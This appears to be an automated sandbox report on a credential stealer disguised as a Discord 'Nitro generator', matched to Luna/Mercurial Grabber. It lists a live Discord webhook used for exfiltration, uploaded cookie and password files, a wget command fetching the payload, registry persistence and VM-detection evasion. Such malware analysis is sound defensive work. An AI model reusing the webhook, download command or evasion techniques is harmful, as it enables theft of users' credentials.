Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.dr, String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810352568766474/Capture.jpg
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr, String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp, String found in binary or memory: https://discord.com
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp, NitroGenV0.5.exe.6.dr, String found in binary or memory: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, String found in binary or memory: https://discord.com8
Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp, String found in binary or memory: https://discord.comx
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr, String found in binary or memory: https://discordapp.com/api/v8/users/
                        Source: NitroGenV0.5.exe.6.drString found in binary or memory: https://i.imgur.com/vgxBhmx.png
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://i.imgur.com/vgxBhmx.pngultipart/form-data
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://ip4.seeip.org
                        Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: https://ip4.seeip.org/
                        Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: https://ip4.seeip.orgx
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810248877211688/cookies.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810251381211176/passwords.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810260252164166/Capture.jpg
                        Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810339021168680/cookies.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810341642612736/passwords.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810352568766474/Capture.jpg
                        Source: NitroGenV0.5.exe, 00000006.00000002.302816261.0000000002D42000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350548671.000000000285E000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://www.countryflags.io/
                        Source: NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: https://www.countryflags.io/CH/flat/48.png
                        Source: unknownHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

                        E-Banking Fraud:

Yara detected MercurialGrabber
Source: Yara match | File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED

                        System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE | Matched rule: Detect Luna stealer (also Mercurial Grabber), Author: Arkbird_SOLG
Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE | Matched rule: Detect Luna stealer (also Mercurial Grabber), Author: Arkbird_SOLG
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE | Matched rule: Detect Luna stealer (also Mercurial Grabber), Author: Arkbird_SOLG
Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE | Matched rule: Detect Luna stealer (also Mercurial Grabber), Author: Arkbird_SOLG
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED | Matched rule: Detect Luna stealer (also Mercurial Grabber), Author: Arkbird_SOLG
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED | Matched rule: Detect Luna stealer (also Mercurial Grabber), Author: Arkbird_SOLG
Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, 17.0.NitroGenV0.5.exe.510000.0.unpack, 6.0.NitroGenV0.5.exe.8e0000.0.unpack, 17.2.NitroGenV0.5.exe.510000.0.unpack (type: UNPACKEDPE); C:\Users\user\Desktop\download\NitroGenV0.5.exe, C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe (type: DROPPED) | Matched rule: MAL_Luna_Stealer_Apr_2021_1, date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BB61F6
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BBBD99
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BB6FA2
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC08936FA2
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC0893BD99
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC089361F6
Source: NitroGenV0.5.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NitroGenV0.5.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\wget.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
Source: unknown | Process created: C:\Users\user\Desktop\download\NitroGenV0.5.exe "C:\Users\user\Desktop\download\NitroGenV0.5.exe"
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\cmdline.out
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | File created: C:\Users\user\AppData\Local\Temp\cookies.db
Source: classification engine | Classification label: mal100.troj.spyw.evad.win@8/11@7/5
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe | Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_01
Source: C:\Windows\SysWOW64\wget.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected

                        Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Unpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Unpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
Source: C:\Windows\SysWOW64\wget.exe | Code function: 4_2_009F29B6 pushfd ; ret 4_2_009F2CF2
Source: C:\Windows\SysWOW64\wget.exe | Code function: 4_2_009EC354 push eax; ret 4_2_009EC355
Source: C:\Windows\SysWOW64\wget.exe | Code function: 4_2_009EC350 push eax; ret 4_2_009EC351
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC08930443 pushad ; ret 17_2_00007FFC08930451
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | File created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe (dropped file)
Source: C:\Windows\SysWOW64\wget.exe | File created: C:\Users\user\Desktop\download\NitroGenV0.5.exe (dropped file)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial Grabber
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99890s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99781s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99671s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99562s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99453s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99343s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99234s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99125s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99015s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -98906s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -98796s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -98684s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99892s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6412 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 1744 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99642s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -98922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -98813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -98642s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6928 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Window / User API: threadDelayed 2881
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Window / User API: threadDelayed 404
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Window / User API: threadDelayed 718
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Window / User API: threadDelayed 2482
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosInformation
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99890
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99781
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99671
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99562
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99453
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99343
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99234
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99125
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99015
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 98906
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 98796
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 98684
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99892
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99642
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99500
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99391
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99281
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99172
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99063
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 98922
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 98813
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 98642
